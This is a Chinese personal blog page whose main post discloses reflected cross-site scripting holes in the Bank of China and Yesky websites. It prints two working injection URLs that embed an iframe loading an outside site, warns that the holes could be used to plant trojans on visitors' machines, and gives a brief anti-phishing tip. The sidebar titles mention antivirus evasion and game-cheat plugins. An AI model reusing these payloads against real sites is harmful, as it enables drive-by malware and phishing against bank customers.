-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [12/21]长沙南方职业技术学院一班主任殴打学生
- [12/20]获取网卡、硬盘、CPU硬件信息
- [12/16]北京欢迎你之盗版
- [12/12]飞信登录时的身份验证
- [12/12]Fetion分析之一:飞信协议类型
- [11/29]某论坛网友因涉嫌揭露政府黑幕被追捕
- [11/29]小哈第二天......
- [11/27]为我的小哈"祈福"
- [11/26]新"成员"---小哈
- [11/23]J8hacker.com 再度开启了....支持
- [11/23]柏拉图式的爱情
- [11/21]女人新标准
- [11/20]编写QQ显IP外挂插件及原理分析
- [11/20]程中加垃圾代码防杀毒
- [11/18]【17日紧急求助】一个父亲的求救,儿子遭歹徒绑架
-
最新评论
-
文章归档
-
Statistics
- 文章总数:194
- 评论总数:67
- 引用总数:0
- 浏览总数:240437
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
-
反向链接
天极和中国银行官方出现XSS漏洞
http://www.boc.cn/cn/common/fourth.jsp?category="><iframe%20src=http://popsky.org/>
http://search.yesky.com/jsp/hint.jsp?type=1&wd=%3C%3E%3C%3E%3Ciframe+src%3D%22http%3A%2F%2Fpopsky.org%22%3E
第一个为中国银行的
第二个为天极的...搜索部分限制的不够严格
利用后果:
构造js脚本或者html代码可以实现网页挂马!
防范措施:注意不要从其他的网站进入了,否则中马率会提升
防止钓鱼攻击哦...


0 Comments , 0 Trackbacks
Jump to comment form | comments rss | Get trackback uri